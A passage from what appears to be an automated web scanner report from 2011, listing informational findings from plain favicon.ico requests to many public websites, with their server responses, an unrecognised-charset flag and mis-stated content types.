<head><title>403 Forbidden</title></head>
<body bgcolor="white">
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx</center>
</body>
</html>

25.19. http://www.firecue.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firecue.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.firecue.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Sat, 02 Apr 2011 14:02:55 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.65</center>
</body>
</html>

25.20. http://www.freedownloadscenter.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freedownloadscenter.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.freedownloadscenter.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 503 Service Temporarily Unavailable
Server: Apache/2.2.3 (CentOS)
Date: Sat, 02 Apr 2011 13:39:34 GMT
Content-Type: text/html
Content-Length: 213
Connection: keep-alive

<html>
<head><title>503 Service Temporarily Unavailable</title></head>
<body bgcolor="white">
<center><h1>503 Service Temporarily Unavailable</h1></center>
<hr><center>nginx/0.7.65</center>
</bod
...[SNIP]...

25.21. http://www.freeze.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freeze.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.freeze.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:38:16 GMT
Content-Length: 103

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

25.22. http://www.hbo.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hbo.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hbo.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:15:40 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
g: u
Content-Type: text/html
Content-Length: 3130

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>HBO: 404 Page Not Found</title>
<script language="JavaScript" src="/scri
...[SNIP]...

25.23. http://www.iloveindia.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iloveindia.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.iloveindia.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:56:57 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.9
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 23719

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<HTML>

<HEAD>
<TITLE>Page not found - iloveindia.com</TITLE>

<LINK HREF="/homestyle.css" TYPE="text/css" REL="STYLESHEET
...[SNIP]...

25.24. http://www.intuit.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intuit.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.intuit.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:39:41 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
P3P: policyref="http://smallbusiness.intuit.com/small-business/privacy/index.jsp",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Content-Length: 3585
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<title>Error 404: Page Not Found</title>
<link href="/css/wcgErrorPgs.css" re
...[SNIP]...

25.25. http://www.iwin.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iwin.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.iwin.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Cache-Control: max-age=86400
Expires: Sun, 03 Apr 2011 13:42:07 GMT
Content-Type: text/html
Server: Apache
Content-Length: 952
Date: Sat, 02 Apr 2011 13:42:07 GMT
X-Varnish: 931872621
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<html><head><title>Apache Tomcat/6.0.14 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...

25.26. http://www.lingospot.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lingospot.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lingospot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: LUI=979b847691af299f; Path=/; Expires=Fri, 31-Dec-2015 23:59:59 GMT; Domain=.lingospot.com
Set-Cookie: LUI=8ac36f99936b606b; Path=/; Expires=Fri, 31-Dec-2015 23:59:59 GMT; Domain=.lingospot.com
Content-Type: text/html
Content-Length: 345
Date: Sat, 02 Apr 2011 14:04:58 GMT
Server: lighttpd/1.4.15

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

25.27. http://www.moviesunlimited.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moviesunlimited.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.moviesunlimited.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:53:31 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

25.28. http://www.music-oasis.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.music-oasis.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.music-oasis.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:45:38 GMT
Content-Length: 103

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

25.29. http://www.olpinhoopes.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.olpinhoopes.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.olpinhoopes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:00:34 GMT
Server: Apache
Content-Type: text/html
Content-Length: 1691

<HTML>
   <HEAD><TITLE>Page Not Found</TITLE></HEAD>

   <BODY BGCOLOR="#FFFFFF" LINK="maroon" VLINK="maroon"
ALINK="maroon">
   <CENTER>
   <TABLE WIDTH="85%" BORDER="1" BORDERCOLOR="#000000"
CELLSPACING="
...[SNIP]...

25.30. http://www.rmloader.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rmloader.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rmloader.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sat, 02 Apr 2011 13:54:11 GMT
Server: lighttpd/1.4.28

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

25.31. http://www.samsung.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.samsung.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.samsung.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 16
Date: Sat, 02 Apr 2011 13:43:30 GMT
Connection: close

Object not found

25.32. http://www.socialsurveys.us/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.socialsurveys.us
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.socialsurveys.us
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:55:46 GMT
Server: UltraDNS Client Redirection Server
Last-Modified: Sat, 02 Apr 2011 13:55:46 GMT
Accept-Ranges: none
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<html>
<head><title>UltraDNS Client Redirection Service</title></head>
<body><table border="2" width="100%">
<tr bgcolor="#FF4444"><th colspan="2"
...[SNIP]...

25.33. http://www.sparkstudios.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sparkstudios.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sparkstudios.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:51:13 GMT
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Cache-Control: private, no-cache, max-age=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 389

<html>
<head><title> 404 Not Found
</title></head>
<body><h1> 404 Not Found
</h1>
The resource requested could not be found on this server!<hr />
Powered By <a href='http://www.litespeedtech.com'>Li
...[SNIP]...

25.34. http://www.springerlink.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.springerlink.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.springerlink.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Date: Sat, 02 Apr 2011 13:45:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 212

<HTML><BODY><H3>403 Forbidden</H3><I>ErrorId: 0428e6a8-4d28-4d50-909e-92b57031a6ae</I><p>Please contact <a href="mailto:support@metapress.com">support@metapress.com</a> if this problem persists.</p></
...[SNIP]...

25.35. http://www.swagbucks.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.swagbucks.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.swagbucks.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Length: 631
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:52:54 GMT

<HTML>
<HEAD>
<TITLE></TITLE>
<style>
body,html{margin: 0; padding: 0; height: 100%; overflow: hidden;}
</style>
</HEAD>
<BODY>
<iframe style="height: 100%; width: 100%;" frameborder="0" src="
...[SNIP]...

25.36. http://www.thegrids.info/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thegrids.info
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thegrids.info
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:05:37 GMT
Server: Apache
X-Powered-By: PHP/5.3.3 ZendServer/5.0
Set-Cookie: PHPSESSID=ckguqfdilu9pmnj7sfqargiqc0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 372
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
</head>
<body>

<div id="header-error">Error</div>

<div class="login-e
...[SNIP]...

25.37. http://www.tidaltv.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tidaltv.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tidaltv.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
p3p: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:33:49 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

25.38. http://www.trafficrevenue.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trafficrevenue.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.trafficrevenue.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 406 Not Acceptable
Date: Sat, 02 Apr 2011 13:24:03 GMT
Server: LiteSpeed
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Cache-Control: max-age=30, public
Cache-Control: private, no-cache, max-age=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 372

<html>
<head><title> 406 Not Acceptable
</title></head>
<body><h1> 406 Not Acceptable
</h1>
This request is not acceptable<hr />
Powered By <a href='http://www.litespeedtech.com'>LiteSpeed Web Serve
...[SNIP]...

25.39. http://www.verisign.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.verisign.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:06:34 GMT
Server: Apache
Set-Cookie: v1st=1ECA364D37B527F1; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.com
Last-Modified: Wed, 19 Jan 2011 20:36:59 GMT
ETag: "28e933b-1536-49a38fa8970c0"
Accept-Ranges: bytes
Content-Length: 5430
Content-Type: text/html

............ .h...&... .... .........(....... ..... ........................................
xP.dU...E...E...F...]*...b.:.............................{.#U...U....................Y..E...yQ............
...[SNIP]...

25.40. http://www.verizon.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizon.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.verizon.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 12346
Content-Type: text/html
Vary: Accept-Encoding
Expires: Sat, 02 Apr 2011 13:37:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:37:47 GMT
Connection: close
Set-Cookie: ASPSESSIONIDACTBSRTC=NNIKMLGDFJLLCPKHOIDHPHBF; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>
<head>
   <title>Verizon Online - Page Not Found</title>
   <meta http-equi
...[SNIP]...

25.41. http://www.woot.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.woot.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.woot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sat, 02 Apr 2011 13:33:10 GMT
Expires: Sat, 09 Apr 2011 13:33:11 GMT
Server: Microsoft-IIS/7.5
Via: 1.1 C aicache6
X-Powered-By: ASP.NET
Content-Length: 103
Connection: keep-alive

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

25.42. http://www.xe.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xe.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.xe.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:50:24 GMT
Server: Apache
Set-Cookie: ID=173.193.214.243.1301752224347582; path=/; expires=Fri, 28-Mar-31 13:50:24 GMT
Last-Modified: Fri, 03 Sep 2010 13:21:25 GMT
ETag: "3780f7-f1-ceba7f40"
Accept-Ranges: bytes
Content-Length: 241
Vary: Accept-Encoding,User-Agent
Cache-Control: no-cache, must-revalidate, proxy-revalidate, max-age=0, s-maxage=0
Connection: close
Content-Type: text/html

<HTML>
<HEAD><TITLE>Autoextraction Prohibited</TITLE></HEAD>
<BODY>
Automated extraction of our content is prohibited. See <A HREF="http://www.xe.com/errors/noautoextract.htm">http://www.xe.com/error
...[SNIP]...

25.43. http://www.y8.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.y8.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.y8.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Sat, 02 Apr 2011 13:35:25 GMT
Content-Type: text/html
Content-Length: 169
Connection: close

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.64</center>
</body>
</html>

25.44. http://www.yfrog.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yfrog.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yfrog.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.8.37
Date: Sat, 02 Apr 2011 13:27:19 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.9
Content-Length: 1406

..............h.......(....... .......................................iXG...f...........................................................................................................................
...[SNIP]...

26. HTML uses unrecognised charset

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.videobash.com
Path:   /favicon.ico

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified (in the meta tag of the response below): ISO88591

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.videobash.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:34:08 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Set-Cookie: is_really_pc=1; expires=Sun, 03-Apr-2011 13:34:08 GMT
Set-Cookie: vbvisit=1; path=/
Connection: close
Content-Type: text/html
Set-Cookie: RNLBSERVERID=ded543; path=/
Content-Length: 37609

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
   <head>
       <meta property="fb:admins" content="100001134225913" />
       <meta http-equiv="Content-Type" content="text/html; charset=ISO88591" />
       <meta name="google-site-verification" content="qVbaeGD8rtAKGrL0XSPtJyDDWct383nA1VMA54i0N44" />
...[SNIP]...

27. Content type incorrectly stated
There are 225 instances of this issue:


27.1. http://www.123greetings.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.123greetings.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.123greetings.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:20 GMT
Expires: Sat, 02 Apr 2011 13:26:54 GMT
Last-Modified: Fri, 19 Mar 2004 10:05:32 GMT
Cache-Control: max-age=900
Content-Type: text/plain; charset=UTF-8
ETag: "57e-168c5300"
Accept-Ranges: bytes
Server: Apache/2.2.3 (CentOS)
Content-Length: 1406
Connection: close

..............h.......(....... ...................................ee..AA..............RR..........~~....~......5...RA..$...bR..D........................................................................
...[SNIP]...

27.2. http://www.2wire.net/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.2wire.net
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.2wire.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:25:05 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Wed, 20 Oct 2010 20:38:29 GMT
ETag: "1d0bd-47e-64579b40"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8
Set-Cookie: TwoWireLB=3217371914.20480.0000; path=/

............ .h.......(....... ..... .........................x(..x(..x(..x(..x(...mR..9..x(..x(..x(..x(..x(..x(..x(..x(..x(..x(..x(..x(..~2.......pU.x(..x(..x(..x(..x(..x(..x(..x(..x(..x(..x(..x(..x(
...[SNIP]...

27.3. http://www.43things.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.43things.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.43things.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:13:02 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 08 Dec 2004 23:03:38 GMT
Accept-Ranges: bytes
Content-Length: 350
Cache-Control: max-age=1
Expires: Sat, 02 Apr 2011 14:13:03 GMT
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8

..............(.......(....... ...............................................................{...k...Z...J...B...1...!..........................P.$ ..N..    .......~.. .w...@~p.....0.p..~r.n.0G.~@)~..0.
...[SNIP]...

27.4. http://www.6waves.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.6waves.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a GIF image.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.6waves.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:56:09 GMT
Server: Apache
Last-Modified: Tue, 01 Mar 2011 10:08:50 GMT
ETag: "7c8853-438-49d68fb975080"
Accept-Ranges: bytes
Content-Length: 1080
Connection: close
Content-Type: text/plain

GIF89a........>j)Nv.'Q.#I.%L.$K+Pw.$JmE9.9f.2`.&O...(Mv"Hr.)V.(S*Ow.Al&Kt.*W.&P.&W.p.rZU..+..).j<>3?..& Eq4@[.*X.%MBOk"Ft/9U...]W^.)Utw..k..~ %Cj.u..j.$Ht<8E....f.76J:7D-/E%Kt..)h?4....w%....u...'.(\.
...[SNIP]...

27.5. http://www.aa.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.aa.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aa.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:00 GMT
Content-Type: text/plain
Last-Modified: Wed, 30 Sep 2009 14:35:22 GMT
Content-Length: 1406
Content-Language: en-US
Server: On-Demand Router/1.0
Via: On-Demand Router/1.0
Age: 1
Warning: 110 /10.243.14.54:12405 "Response is stale"
Vary: Accept-Encoding, User-Agent

..............h.......(....... ...........@.......................f33.33.......tY......f3..........iK.VM..........f]........l.yn........................................................................
...[SNIP]...

27.6. http://www.aarp.org/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.aarp.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aarp.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:38:11 GMT
Server: Apache
Last-Modified: Sat, 02 Apr 2011 11:07:34 GMT
Accept-Ranges: bytes
Content-Length: 1406
NodeID: ws6-md.aarp.net
Cache-Control: no-cache
Content-Type: text/plain; charset=UTF-8
Set-Cookie: BIGipServerwww-md.aarp.org=2887690432.20480.0000; path=/

..............h.......(....... ...............................%2..........nw......6B..CO..........|...................Wa..w~............................................................................
...[SNIP]...

27.7. http://www.ad4game.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ad4game.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
